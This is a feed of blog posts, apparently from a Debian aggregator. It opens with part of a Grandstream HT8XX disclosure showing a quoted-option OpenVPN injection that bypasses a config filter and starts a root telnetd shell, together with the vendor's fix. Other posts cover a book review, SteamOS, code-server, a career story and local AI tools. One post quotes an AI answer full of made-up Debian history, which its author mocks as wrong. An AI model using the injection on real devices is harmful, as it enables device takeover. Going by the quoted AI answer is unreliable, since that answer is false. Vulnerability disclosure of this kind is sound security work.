echo "$(nvram get 8460)" | sed -e 's/;/\n/g' | sed -e '/script-security/d' -e '/^[ ]*down /d' -e '/^[ ]*up /d' -e '/^[ ]*learn-address /d' -e '/^[ ]*tls-verify /d' -e '/^[ ]*client-[dis]*connect /d' -e '/^[ ]*route-up/d' -e '/^[ ]*route-pre-down /d' -e '/^[ ]*auth-user-pass-verify /d' -e '/^[ ]*ipchange /d' >> ${CONF_FILE}
That means it deletes all lines that either contain script-security or start with a set of options that allow command execution. Looking at the OpenVPN configuration template (/etc/openvpn/openvpn.conf), it already uses up and therefore sets script-security 2, so injecting that is unnecessary. Thus if one can somehow inject "/bin/ash -c 'telnetd -l /bin/sh -p 1271'" in one of the command-executing options, a reverse shell will be opened. The filtering looks for lines that start with zero or more occurrences of a space, followed by the option name (up, down, etc), followed by another space. While OpenVPN happily accepts tabs instead of spaces in the configuration file, I wasn't able to inject a tab either via the web interface or via SSH/gs_config. However, OpenVPN also allows quoting, which is only documented for parameters, but works just as well for option names too. That means that instead of
up "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
from the original exploit by Tenable, we write
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
this will still be a valid OpenVPN configuration statement, but the filtering in /etc/rc.d/init.d/openvpn won't catch it and the resulting OpenVPN configuration will include the exploit:
# grep -E '(up|script-security)' /etc/openvpn.conf
up /etc/openvpn/openvpn.up
up-restart
;group nobody
script-security 2
"up" "/bin/ash -c 'telnetd -l /bin/sh -p 1271'"
And with that, once the OpenVPN connection is established, a reverse shell is spawned:
/ # uname -a
Linux HT8XXV2 4.4.143 #108 SMP PREEMPT Mon May 13 18:12:49 CST 2024 armv7l GNU/Linux
/ # id
uid=0(root) gid=0(root)
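To see why the quoting trick works, here is a rough Python approximation (mine, not Grandstream's actual code) of the 1.0.3.5 sed filter; the quoted variant does not start with spaces followed by a bare option name, so none of the patterns match:

import re

# Rough approximation of the 1.0.3.5 filter: drop lines containing
# script-security, or starting with optional spaces, an option name
# that can execute commands, and a space.
opts = ["down", "up", "learn-address", "tls-verify",
        "client-[dis]*connect", "route-up", "route-pre-down",
        "auth-user-pass-verify", "ipchange"]
rules = [re.compile("script-security")] + \
        [re.compile(r"^[ ]*" + o + " ") for o in opts]

def survives_filter(line):
    return not any(r.search(line) for r in rules)

print(survives_filter("up /tmp/evil.sh"))    # False: filtered out
print(survives_filter('"up" /tmp/evil.sh'))  # True: slips through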
Affected devices

Fix After disclosing this issue to Grandstream, they have issued a new firmware release (1.0.3.10) which modifies the filtering to the following:
echo "$(nvram get 8460)" | sed -e 's/;/\n/g' \
                         | sed -e '/script-security/d' \
                               -e '/^["'\'' \f\v\r\n\t]*down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*learn-address["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*tls-crypt-v2-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*client-[dis]*connect["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-up["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*route-pre-down["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*auth-user-pass-verify["'\'' \f\v\r\n\t]/d' \
                               -e '/^["'\'' \f\v\r\n\t]*ipchange["'\'' \f\v\r\n\t]/d' >> ${CONF_FILE}
So far I was unable to inject any further commands in this block.

Timeline

10 February 2025

Russ Allbery: Review: The Scavenger Door

Review: The Scavenger Door, by Suzanne Palmer
Series: Finder Chronicles #3
Publisher: DAW
Copyright: 2021
ISBN: 0-7564-1516-0
Format: Kindle
Pages: 458
The Scavenger Door is a science fiction adventure and the third book of the Finder Chronicles. While each of the books of this series stands alone reasonably well, I would still read the series in order. Each book has some spoilers for the previous book. Fergus is back on Earth following the events of Driving the Deep, at loose ends and annoying his relatives. To get him out of their hair, his cousin sends him into the Scottish hills to find a friend's missing flock of sheep. Fergus finds things professionally, but usually not livestock. It's an easy enough job, though; the lead sheep was wearing a tracker and he just has to get close enough to pick it up. The unexpected twist is also finding a metal fragment buried in a hillside that has some strange resonance with the unwanted gift that Fergus got in Finder. Fergus's alien friend Ignatio is so alarmed by the metal fragment that he turns up in person in Fergus's cousin's bar in Scotland. Before he arrives, Fergus gets a mysteriously infuriating warning visit from alien acquaintances he does not consider friends. He has, as usual, stepped into something dangerous and complicated, and now somehow it's become his problem. So, first, we get lots of Ignatio, who is an enthusiastic large ball of green fuzz with five limbs who mostly speaks English but does so from an odd angle. This makes me happy because I love Ignatio and his tendency to take things just a bit too literally.
SANTO'S, the sign read. Under it, in smaller letters, was CURIOSITIES AND INCONVENIENCES FOR COMMENDABLE SUMS. "Inconveniences sound just like my thing," Fergus said. "You two want to wait in the car while I check it out?" "Oh, no, I am not missing this," Isla said, and got out of the podcar. "I am uncertain," Ignatio said. "I would like some curiouses, but not any inconveniences. Please proceed while I decide, and if there is also murdering or calamity or raisins, you will yell right away, yes?"
Also, if your story setup requires a partly-understood alien artifact that the protagonist can get some explanations for but not have the mystery neatly solved for them, Ignatio's explanations are perfect.
"It is a door. A doorbell. A... peephole? A key. A control light. A signal. A stop-and-go sign. A road. A bridge. A beacon. A call. A map. A channel. A way," Ignatio said. "It is a problem to explain. To say a doorkey is best, and also wrong. If put together, a path may be opened." "And then?" "And then the bad things on the other side, who we were trying to lock away, will be free to travel through."
Second, the thing about Palmer's writing that continues to impress me is her ability to take a standard science fiction plot, one whose variations I've read probably dozens of times before, and still make it utterly engrossing. This book is literally a fetch quest. There are a bunch of scattered fragments, Fergus has to find them and keep them from being assembled, various other people are after the same fragments, and Fergus either has to get there first or get the fragments back from them. If you haven't read this book before, you've played the video game or watched the movie. The threat is basically a Stargate SG-1 plot. And yet, this was so much fun. The characters are great. This book leans less on found family than the last one and a bit more on actual family. When I started reading this series, Fergus felt a bit bland in the way that adventure protagonists sometimes can, but he's fleshed out nicely as the series goes along. He's not someone who tends to indulge in big emotions, but now the reader can tell that's because he's the kind of person who finds things to do in order to keep from dwelling on things he doesn't want to think about. He's unflappable in a quietly competent way while still having a backstory and emotional baggage and a rich inner life that the reader sees in glancing fragments. We get more of Fergus's backstory, particularly around Mars, but I like that it's told in anecdotes and small pieces. The last thing Fergus wants to do is wallow in his past trauma, so he doesn't and finds something to do instead. There's just enough detail around the edges to deepen his character without turning the book into a story about Fergus's emotions and childhood. It's a tricky balancing act that Palmer handles well. There are also more sentient ships, and I am so in favor of more sentient ships.
"When I am adding a new skill, I import diagnostic and environmental information specific to my platform and topology, segregate the skill subroutines to a dedicated, protected logical space, run incremental testing on integration under all projected scenarios and variables, and then when I am persuaded the code is benevolent, an asset, and provides the functionality I was seeking, I roll it into my primary processing units," Whiro said. "You cannot do any of that, because if I may speak in purely objective terms you may incorrectly interpret as personal, you are made of squishy, unreliable goo."
We get the normal pieces of a well-done fetch quest: wildly varying locations, some great local characters (the US-based trauma surgeons on vacation in Australia were my favorites), and believable antagonists. There are two other groups looking for the fragments, and while one of them is the standard villain in this sort of story, the other is an apocalyptic cult whose members Fergus mostly feels sorry for and who add just the right amount of surreality to the story. The more we find out about them, the more believable they are, and the more they make this world feel like realistic messy chaos instead of the obvious (and boring) good versus evil patterns that a lot of adventure plots collapse into. There are things about this book that I feel like I should be criticizing, but I just can't. Fetch quests are usually synonymous with lazy plotting, and yet it worked for me. The way Fergus gets dumped into the middle of this problem starts out feeling as arbitrary and unmotivated as some video game fetch quest stories, but by the end of the book it starts to make sense. The story could arguably be described as episodic and cliched, and yet I was thoroughly invested. There are a few pacing problems at the very end, but I was too invested to care that much. This feels like a book that's better than the sum of its parts. Most of the story is future-Earth adventure with some heist elements. The ending goes in a rather different direction but stays at the center of the classic science fiction genre. The Scavenger Door reaches a satisfying conclusion, but there are a ton of unanswered questions that will send me on to the fourth (and reportedly final) novel in the series shortly. This is great stuff. It's not going to win literary awards, but if you're in the mood for some classic science fiction with fun aliens and neat ideas, but also benefiting from the massive improvements in characterization the genre has seen in the past forty years, this series is perfect. Highly recommended. Followed by Ghostdrift. Rating: 9 out of 10

5 February 2025

Alberto Garc a: Keeping your system-wide configuration files intact after updating SteamOS

Introduction If you use SteamOS and you like to install third-party tools or modify the system-wide configuration some of your changes might be lost after an OS update. Read on for details on why this happens and what to do about it.
As you all know SteamOS uses an immutable root filesystem and users are not expected to modify it because all changes are lost after an OS update. However this does not include configuration files: the /etc directory is not part of the root filesystem itself. Instead, it's a writable overlay and all modifications are actually stored under /var (together with all the usual contents that go in that filesystem such as logs, cached data, etc). /etc contains important data that is specific to that particular machine like the configuration of known network connections, the password of the main user and the SSH keys. This configuration needs to be kept after an OS update so the system can keep working as expected. However the update process also needs to make sure that other changes to /etc don't conflict with whatever is available in the new version of the OS, and there have been issues due to some modifications unexpectedly persisting after a system update. SteamOS 3.6 introduced a new mechanism to decide what to keep after an OS update, and the system now keeps a list of configuration files that are allowed to be kept in the new version. The idea is that only the modifications that are known to be important for the correct operation of the system are applied, and everything else is discarded [1]. However, many users want to be able to keep additional configuration files after an OS update, either because the changes are important for them or because those files are needed for some third-party tool that they have installed. Fortunately the system provides a way to do that, and users (or developers of third-party tools) can add a configuration file to /etc/atomic-update.conf.d, listing the additional files that need to be kept. There is an example in /etc/atomic-update.conf.d/example-additional-keep-list.conf that shows what this configuration looks like.
Sample configuration file for the SteamOS updater
Developers who are targeting SteamOS can also use this same method to make sure that their configuration files survive OS updates. As an example of an actual third-party project that makes use of this mechanism you can have a look at the DeterminateSystems Nix installer: https://github.com/DeterminateSystems/nix-installer/blob/v0.34.0/src/planner/steam_deck.rs#L273 As usual, if you encounter issues with this or any other part of the system you can check the SteamOS issue tracker. Enjoy!
  1. A copy is actually kept under /etc/previous to give the user the chance to recover files if necessary, and up to five previous snapshots are kept under /var/lib/steamos-atomupd/etc_backup

2 February 2025

Joachim Breitner: Coding on my eInk Tablet

For many years I wished I had a setup that would allow me to work (that is, code) productively outside in the bright sun. It's winter right now, but when it's summer again it's always a bit. This weekend I got closer to that goal. TL;DR: Using code-server on a beefy machine seems to be quite neat.
Passively lit coding

Personal history Looking back at my own old blog entries I find one from 10 years ago describing how I bought a Kobo eBook reader with the intent of using it as an external monitor for my laptop. It seems that I got a proof-of-concept setup working, using VNC, but it was tedious to set up, and I never actually used that. I subsequently noticed that the eBook reader is rather useful to read eBooks, and it has been in heavy use for that ever since. Four years ago I gave this old idea another shot and bought an Onyx BOOX Max Lumi. This is an A4-sized tablet running Android and had the very promising feature of an HDMI input. So hopefully I could attach it to my laptop and it would "just work". Turns out that this never worked as well as I hoped: even if I set the resolution to exactly the tablet's screen's resolution I got blurry output, and it also drained the battery a lot, so I gave up on this. I subsequently noticed that the tablet is rather useful to take notes, and it has been in sporadic use for that. Going off on this tangent: I later learned that the HDMI input of this device appears to the system like a camera input, and I don't have to use Boox's monitor app but could use other apps like FreeDCam as well. This somehow managed to fix the resolution issues, but the setup still wasn't convenient enough to be used regularly. I also played around with pure terminal approaches, e.g. SSHing into a system, but since my usual workflow was never purely text-based (I was at least used to using a window manager instead of a terminal multiplexer like screen or tmux) that never led anywhere either.

VSCode, working remotely Since these attempts I have started a new job working on the Lean theorem prover, and working on or with Lean basically means using VSCode. (There is a very good neovim plugin as well, but I'm using VSCode nevertheless, if only to make sure I am dogfooding our default user experience.) My colleagues have said good things about using VSCode with the remote SSH extension to work on a beefy machine, so I gave this a try now as well, and while it's not a complete game changer for me, it does make certain tasks (rebuilding everything after switching branches, running the test suite) very convenient. And it's a bit spooky to run these workloads without the laptop's fan spinning up. In this setup, the workspace is remote, but VSCode still runs locally. But it made me wonder about my old goal of being able to work reasonably efficiently on my eInk tablet. Can I replicate this setup there? VSCode itself doesn't run on Android directly. There are projects that run a Linux chroot or in termux on the Android system, and then you can use VNC to connect to it (e.g. on Andronix), but that did not seem promising. It seemed fiddly, and I probably should take it easy on the tablet's system.

code-server, running remotely A more promising option is code-server. This is a fork of VSCode (actually of VSCodium) that runs completely on the remote machine, and the client machine just needs a browser. I set that up this weekend and found that I was able to do a little bit of work reasonably well.

Access With code-server one has to decide how to expose it safely enough. I decided against the tunnel-over-SSH option, as I expected that to be somewhat tedious to set up (both initially and for each session) on the Android system, and I liked the idea of being able to use any device to work in my environment. I also decided against the more involved reverse-proxy-behind-proper-hostname-with-SSL setups, because they involve a few extra steps, and some of them I cannot do as I do not have root access on the shared beefy machine I wanted to use. That left me with the option of using code-server's built-in support for self-signed certificates and a password:
$ cat .config/code-server/config.yaml
bind-addr: 1.2.3.4:8080
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: true
With trust-on-first-use this seems reasonably secure. Update: I noticed that the browsers would forget that I trust this self-signed cert after restarting the browser, and also that I cannot install the page (as a Progressive Web App) unless it has a valid certificate. But since I don't have superuser access to that machine, I can't just follow the official recommendation of using a reverse proxy on port 80 or 443 with automatic certificates. Instead, I pointed a hostname that I control to that machine, obtained a certificate manually on my laptop (using acme.sh) and copied the files over, so the configuration now reads as follows:
bind-addr: 1.2.3.4:3933
auth: password
password: xxxxxxxxxxxxxxxxxxxxxxxx
cert: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.cer
cert-key: .acme.sh/foobar.nomeata.de_ecc/foobar.nomeata.de.key
(This is getting very specific to my particular needs and constraints, so I'll spare you the details.)

Service To keep code-server running I created a systemd service that's managed by my user's systemd instance:
~ $ cat ~/.config/systemd/user/code-server.service
[Unit]
Description=code-server
After=network-online.target
[Service]
Environment=PATH=/home/joachim/.nix-profile/bin:/nix/var/nix/profiles/default/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games
ExecStart=/nix/var/nix/profiles/default/bin/nix run nixpkgs#code-server
[Install]
WantedBy=default.target
(I am using nix as a package manager on a Debian system there, hence the additional PATH and complex ExecStart. If you have a more conventional setup then you do not have to worry about Environment and can likely use ExecStart=code-server.) For this to survive me logging out I had to ask the system administrator to run loginctl enable-linger joachim, so that systemd allows my jobs to linger.

Git credentials The next issue to be solved was how to access the git repositories. The work is all on public repositories, but I still need a way to push my work. With the classic VSCode-SSH-remote setup from my laptop, this is no problem: my local SSH key is forwarded using the SSH agent, so I can seamlessly use that on the other side. But with code-server there is no SSH key involved. I could create a new SSH key and store it on the server. That did not seem appealing, though, because SSH keys on Github always have full access. It wouldn't be horrible, but I still wondered if I can do better. I thought of creating fine-grained personal access tokens that allow me to push code to specific repositories only, and nothing else, and just storing them permanently on the remote server. Still a neat and convenient option, but creating PATs for our org requires approval and I didn't want to bother anyone on the weekend. So I am experimenting with Github's git-credential-manager now. I have configured it to use git's credential cache with an elevated timeout, so that once I log in, I don't have to again for one workday.
$ nix-env -iA nixpkgs.git-credential-manager
$ git-credential-manager configure
$ git config --global credential.credentialStore cache
$ git config --global credential.cacheOptions "--timeout 36000"
To log in, I have to visit https://github.com/login/device on an authenticated device (e.g. my phone) and enter an 8-character code. Not too shabby in terms of security. I only wish that webpage would not require me to press Tab after each character. This still grants rather broad permissions to the code-server, but at least only temporarily.

Android setup On the client side I could now open https://host.example.com:8080 in Firefox on my eInk Android tablet, click through the warning about self-signed certificates, log in with the fixed password mentioned above, and start working! I switched to a theme that supposedly is eInk-optimized (eInk by Mufanza). It's not perfect (e.g. git diffs are unhelpful because it is not possible to distinguish deleted from added lines), but it's a start. There are more eInk themes on the official Visual Studio Marketplace, but because code-server is a fork it cannot use that marketplace, and for example this theme isn't on Open-VSX. For some reason the F11 key doesn't work, but going fullscreen is crucial, because screen estate is scarce in this setup. I can go fullscreen using VSCode's command palette (Ctrl-P) and invoking the command there, but Firefox often jumps out of the fullscreen mode, which is annoying. I still have to pay attention to when that's happening; maybe it's the Esc key, which I am of course using a lot due to me using vim bindings. A more annoying problem was that on my Boox tablet, sometimes the on-screen keyboard would pop up, which is seriously annoying! It took me a while to track this down: the Boox has two virtual keyboards installed, the usual Google AOSP keyboard and the Onyx Keyboard. The former is clever enough to stay hidden when there is a physical keyboard attached, but the latter isn't. Moreover, pressing Shift-Ctrl on the physical keyboard rotates through the virtual keyboards. Now, VSCode has many keyboard shortcuts that require Shift-Ctrl (especially on an eInk device, where you really want to avoid using the mouse). And the limited settings exposed by the Boox Android system do not allow you to configure that or disable the Onyx keyboard! To solve this, I had to install the KISS Launcher, which would allow me to see more Android settings, and in particular allow me to disable the Onyx keyboard. So this is fixed. I was hoping to improve the experience even more by opening the web page as a Progressive Web App (PWA), as described in the code-server FAQ. Unfortunately, that did not work. Firefox on Android did not recognize the site as a PWA (even though it recognizes a PWA test page). And I couldn't use Chrome either because (unlike Firefox) it would not consider a site with a self-signed certificate as a secure context, and then code-server does not work fully. Maybe this is just some bug that gets fixed in later versions. Now that I use a proper certificate, I can use it as a Progressive Web App, and with Firefox on Android this starts the app in full-screen mode (no system bars, no location bar). The F11 key still doesn't work, and using the command palette to enter fullscreen does nothing visible, but then Esc leaves that fullscreen mode and I suddenly have the system bars again. But maybe if I just don't do that I get the full screen experience. We'll see. I did not work enough with this yet to assess how much the smaller screen estate, the lack of colors and the slower refresh rate will bother me. I probably need to hide Lean's InfoView more often, and maybe use the Error Lens extension, to avoid having to split my screen vertically. I also cannot easily work on a park bench this way, with a tablet and a separate external keyboard. I'd need at least a table, or some additional piece of hardware that turns tablet + keyboard into some laptop-like structure that I can put on my, well, lap.
There are cases for Onyx products that include a keyboard, and maybe they work on the lap, but they don't have the TrackPoint that I have on my ThinkPad TrackPoint Keyboard II, and how can you live without that?

Conclusion After this initial setup, chances are good that entering and using this environment is convenient enough for me to actually use it; we will see when it gets warmer. A few bits could be better. In particular, logging in and authenticating GitHub access could be both more convenient and safer. I could imagine that when I open the page I confirm that on my phone (maybe with a fingerprint), and that this temporarily grants access to the code-server and to specific GitHub repositories only. Is that easily possible?

31 January 2025

Divine Attah-Ohiemi: Seeking Opportunities: Building a Career in Software Engineering and Beyond

My journey in CS has always been driven by curiosity, determination, and a deep love for understanding software solutions at their tiniest, most complex levels. Taking the ALX Africa Software Engineer track after high school was where it all started for me. During the 1-year intensive bootcamp, I delved into the intricacies of Linux programming and low-level programming with C, which solidified my foundational knowledge. This experience not only enhanced my technical skills but also taught me the importance of adaptability and self-directed learning. I discovered how to approach challenges with curiosity, igniting a passion for exploring software solutions in their most intricate forms. Each module pushed me to think critically and creatively, transforming my understanding of technology and its capabilities. Let's just say that I have always been drawn to asking, "How does this happen?" And I just go on and on until I find an answer eventually, and sometimes I don't, but that's okay. That curiosity, combined with a deep commitment to learning, has guided my journey. Debian Webmaster My drive has led me to get involved in open-source contributions, where I can put my knowledge to the test while helping my community. Engaging with real-world experts and learning from my mistakes has been invaluable. One of the highlights of this journey was joining the Debian Webmasters team as an intern through Outreachy. Here, I have the honor of working on redesigning and migrating the old Debian webpages to make them more user-friendly. This experience not only allows me to apply my skills in a practical setting but also deepens my understanding of collaborative software development. Building My Skills: The Foundation of My Experience Throughout my academic and professional journey, I have taken on many roles that have shaped my skills and prepared me for what's ahead, I believe. I am definitely not a one-trick pony, and maybe not completely a jack of all trades either, but I am a bit diverse, I'd like to think. Here are the key roles that have defined my journey so far: Volunteer Developer at Yoris Africa (June 2022 - August 2023) I began my career by volunteering at Yoris, where I collaborated with a talented team to design and build the frontend for a mobile app. My contributions extended beyond just the frontend; I also worked on backend solutions and microservices, gaining hands-on experience in full-stack development. This role was instrumental in shaping my understanding of software architecture, allowing me to contribute meaningfully to projects while learning from experienced developers in a dynamic environment. Freelance Academics Software Developer (September 2023 - October 2024) I freelanced as an academic software developer, where I pitched and developed software solutions for universities in my community. One of my most notable projects was creating a Computer-Based Testing (CBT) software for a medical school, which featured a unique questionnaire and scoring system tailored to their specific needs. This experience not only allowed me to apply my technical skills in a real-world setting but also deepened my understanding of educational software requirements and user experience, ultimately enhancing the learning process for students. Open Source Intern at Debian Webmaster Team (November 2024 -) Perhaps the most transformative experience has been my role as an intern at Debian Webmasters. This opportunity allowed me to delve into the fascinating world of open source.
As an intern, I have the chance to work on a project where we are redesigning and migrating the Debian webpages to utilize a new and faster technology: Go templates with Hugo. For a detailed look at the work and progress I made during my internship, as well as information on this project and how to get involved, you can check out the wiki. My ultimate goal with this role is to build a vibrant community for Debian in Africa and, if given the chance, to host a debian-cd mirror for faster installations in my region. You can connect with me through LinkedIn, or X (formerly Twitter), or reach out via email.

29 January 2025

Sergio Talens-Oliag: Testing DeepSeek with Ollama and Open WebUI

With all the recent buzz about DeepSeek and its capabilities, I've decided to give it a try using Ollama and Open WebUI on my work laptop, which has an NVIDIA GPU:
$ lspci | grep NVIDIA
0000:01:00.0 3D controller: NVIDIA Corporation GA107GLM [RTX A2000 8GB Laptop GPU]
             (rev a1)
For the installation I initially looked into the approach suggested in this article, but after reviewing it I decided to go for a docker-only approach, as it leaves my system clean and updates are easier.

Step 0: Install docker

I already had it on my machine, so nothing to do here.

Step 1: Install the nvidia-container-toolkit package

As it is needed to use the NVIDIA GPU with docker, I followed the instructions to install the package using apt from the NVIDIA website.
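I won't reproduce the full instructions here, but at the time of writing the repository setup looked roughly like the following sketch (based on the NVIDIA documentation; check the official page for the current commands, all of them run as root):
# Add the GPG key and repository definition for the toolkit (sketch
# based on the NVIDIA documentation, verify against the official page)
curl -fsSL https://nvidia.github.io/libnvidia-container/gpgkey \
  | gpg --dearmor -o /usr/share/keyrings/nvidia-container-toolkit-keyring.gpg
curl -fsSL https://nvidia.github.io/libnvidia-container/stable/deb/nvidia-container-toolkit.list \
  | sed 's#deb https://#deb [signed-by=/usr/share/keyrings/nvidia-container-toolkit-keyring.gpg] https://#' \
  > /etc/apt/sources.list.d/nvidia-container-toolkit.list
# Install the package, enable the nvidia runtime for docker and restart it
apt update
apt install nvidia-container-toolkit
nvidia-ctk runtime configure --runtime=docker
systemctl restart docker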

Step 2: Run the Open WebUI container bundled with Ollama

I could install ollama directly on linux or run it on docker, but I found out that there is a container with Open WebUI bundled with Ollama, so I decided to use it instead. To start the container I've executed the following command:
docker run -d \
  -e OLLAMA_HOST="0.0.0.0:11434" -p 127.0.0.1:11434:11434 \
  -p 127.0.0.1:3000:8080 \
  -v ollama:/root/.ollama \
  -v open-webui:/app/backend/data \
  --gpus=all --name open-webui --restart always \
  ghcr.io/open-webui/open-webui:ollama
Once the container is up and running, I can access the Open WebUI on http://localhost:3000/ and the Ollama API on http://localhost:11434/ (I added the OLLAMA_HOST environment variable to bind the server to all the container IPs, as that is needed to be able to expose it to the host).
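A quick way to confirm that the API is reachable from the host is to query the version endpoint with curl (this just assumes the Ollama HTTP API is exposed as described above); if everything is working it returns a small JSON document with the server version:
curl -s http://localhost:11434/api/version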

Step 3: Install DeepSeek-R1 model from Open WebUI

After creating an admin user on the Open WebUI, I went to the select a model button and asked to download the deepseek-r1 model (at the time of writing this it matches version deepseek-r1:7b, which uses 4.7GB of space). After the download was completed I was able to start chatting with the model on my local machine.
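The download can presumably also be triggered from the command line using the ollama binary bundled in the container (assuming it is available on the image's PATH), for example:
docker exec open-webui ollama pull deepseek-r1:7b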

Step 4: Ask a question

The first question I asked was "Can you tell me what is Debian?" and the answer I got was:
Debian is one of the most popular Linux distributions used worldwide. It is an
open-source operating system that has been around since 1993 and is known for
its stability, security, and reliability. Debian is widely used in servers, data
centers, and enterprise environments because it provides a robust base platform
with excellent documentation, tools, and community support.
### Key Features of Debian:

1. **History**:
   - Debian started as a project called "Pop!!" (Pootle) led by Lars Knutsen, a
     developer from Denmark.
   - It was initially forked from the Linux distribution Red Hat's RH-Debian to
     gain independence and reduce reliance on Red Hat.

2. **Use Cases**:
   - Debian is commonly used as an operating system for servers due to its
     reliability and ease of use in enterprise environments.
   - It is also used for individual user machines (laptops, desktops) because it
     offers a smooth and stable experience.
   - Debian provides the foundation for many popular derivatives like Ubuntu,
     which are designed for consumer use.

3. **Supported Architectures**:
   - Debian supports all major Linux architectures, including 32-bit and 64-bit
     systems, and runs on a wide range of hardware from old servers to modern
     smartphones.

4. **Package Management**:
   - Debian comes with a robust package management system called **Debian Policy
     Language (DPL)**, which allows users to easily install, update, and manage
     software packages.
   - This makes it easy for users to keep their systems up to date without
     needing to download multiple repositories or deal with version conflicts.

5. **Security Focus**:
   - Debian is known for its strong security practices. It has a reputation for
     being one of the most stable Linux distributions, making it a favorite
     among organizations that prioritize security.
   - The distribution regularly updates its software packages to patch
     vulnerabilities and protect against common attacks.

6. **Compatibility with Servers**:
   - Debian is widely used in data centers because it provides a consistent and
     reliable environment for running servers and applications.
   - Many open-source projects are compatible with Debian, making it an ideal
     choice for developers who want to work on servers or distributed systems.

7. **Popularity**:
   - Debian has a large and active community of users and contributors.
   - It is one of the most widely used Linux distributions in the world, with
     many enterprise organizations relying on it as their primary operating
     system.
### Comparison with Other Distributions:
- **Ubuntu**: Ubuntu is based on Debian but adds graphical user interfaces (like
  Gutsy Gibbon), modern tools (like GIMP and LibreOffice), and integrates with
  Microsoft services.
- **RHEL (Red Hat Enterprise Linux)**: RHEL is a derivative of Red Hat's
  distribution, which forked from Debian. It focuses more heavily on enterprise
  security and support compared to Debian.
### Why Debian?
Debian is popular because:
- It is free and open-source, making it accessible to anyone.
- It provides excellent documentation and tools for system administrators.
- It has a strong focus on stability and reliability.
- It supports a wide range of hardware and software needs.
If you're looking for a reliable and flexible Linux distribution that works well
in both personal and enterprise environments, Debian is an excellent choice.
I haven't tried the same question with ChatGPT, but the History, Package Management and Comparison with Other Distributions sections are hilarious; still, they provided me with important data:
  • Now I know that APT is the real Debian Project Leader; what I don't know is why we have elections each year ;)
  • Linux Distributions are recursive: Debian was a fork of Red Hat, which was a fork of Debian, which was a fork of Red Hat, …
As everybody is testing the model I will not talk more about the chat and the results; I just thought that this answer was really funny.

Step 5: Install the DeepSeek Coder and DeepSeek Coder v2 models from Open WebUI

As done before, to download the models I went to the select a model button and asked to download the deepseek-coder and deepseek-coder-v2 models (the default version of the first one is said to be really quick and small, while version two is supposed to be better but slower and bigger, so I decided to install both for testing).
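As before, the same could presumably be done from the command line with the bundled ollama binary:
docker exec open-webui ollama pull deepseek-coder
docker exec open-webui ollama pull deepseek-coder-v2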

Step 6: Integrate Ollama with Neovim

For some months now I've been using GitHub Copilot with Neovim; I don't feel it has been very helpful in the general case, but I wanted to try it and it comes in handy when you need to perform repetitive tasks when programming. It seems that there are multiple neovim plugins that support ollama; for now I've installed and configured the codecompanion plugin in my config.lua file using packer:
require('packer').startup(function()
  [...]
  -- Codecompanion plugin
  use {
    "olimorris/codecompanion.nvim",
    requires = {
      "nvim-lua/plenary.nvim",
      "nvim-treesitter/nvim-treesitter",
    },
  }
  [...]
end)
[...]
-- --------------------------------
-- BEG: Codecompanion configuration
-- --------------------------------
-- Module setup
local codecompanion = require('codecompanion').setup({
  adapters = {
    ollama = function()
      return require('codecompanion.adapters').extend('ollama', {
        schema = {
          model = {
            default = 'deepseek-coder-v2:latest',
          },
        },
      })
    end,
  },
  strategies = {
    chat = { adapter = 'ollama' },
    inline = { adapter = 'ollama' },
  },
})
-- --------------------------------
-- END: Codecompanion configuration
-- --------------------------------
I've tested it a little bit and it seems to work fine, but I'll have to use it more to see if it is really useful; I'll try to do that on future projects.

Conclusion

At a personal level I don't like nor trust AI systems, but as long as they are treated as tools and not as a magical thing you must trust, they have their uses, and I'm happy to see open source tools like Ollama and models like DeepSeek available for everyone to use.

27 January 2025

Sergio Talens-Oliag: Running a Debian Sid on Ubuntu

Although I am a Debian Developer (not very active, BTW) I am using Ubuntu LTS (right now version 24.04.1) on my main machine; it is my work laptop and I was told to keep using Ubuntu on it when it was assigned to me, although I don't believe it is really necessary or justified (I don't need support, I don't provide support to others and I usually test my shell scripts on multiple systems if needed anyway). Initially I kept using Debian Sid on my personal laptop, but I gave it to my oldest son, as the one he was using (an old Dell XPS 13) was stolen from him a year ago. I am still using Debian stable on my servers (one at home that also runs LXC containers and another one on an OVH VPS), but I don't have a Debian Sid machine anymore, and while I could reinstall my work machine, I've decided I'm going to try to use a system container to run Debian Sid on it. As I want to use a container instead of a VM I've narrowed my options to lxc or systemd-nspawn (I have docker and podman installed, but I don't believe they are good options for running system containers). As I will want to take snapshots of the container filesystem I've decided to try incus instead of systemd-nspawn (I already have experience with systemd-nspawn, and while it works well it has fewer features than incus).

Installing incus

As this is a personal system where I want to try things, instead of using the packages included with Ubuntu I've decided to install the ones from the zabbly incus stable repository. To do it I've executed the following as root:
# Get the zabbly repository GPG key
curl -fsSL https://pkgs.zabbly.com/key.asc -o /etc/apt/keyrings/zabbly.asc
# Create the zabbly-incus-stable.sources file
sh -c 'cat <<EOF > /etc/apt/sources.list.d/zabbly-incus-stable.sources
Enabled: yes
Types: deb
URIs: https://pkgs.zabbly.com/incus/stable
Suites: $(. /etc/os-release && echo ${VERSION_CODENAME})
Components: main
Architectures: $(dpkg --print-architecture)
Signed-By: /etc/apt/keyrings/zabbly.asc
EOF'
Initially I only plan to use the command line tools, so I've installed the incus and the incus-extra packages, but once things work I'll probably install the incus-ui-canonical package too, at least for testing it:
apt update
apt install incus incus-extra

Adding my personal user to the incus-admin group

To be able to run incus commands as my personal user I've added it to the incus-admin group:
sudo adduser "$(id -un)" incus-admin
And I've logged out of my desktop session and back in again to make the changes effective.
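Alternatively, to get the new group in the current terminal without restarting the whole session, a sub-shell with the group applied can be started with newgrp (of course, that only affects that shell):
newgrp incus-admin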

Initializing the incus environment

To configure the incus environment I've executed the incus admin init command and accepted the defaults for all the questions, as they are good enough for my current use case.

Creating a Debian container

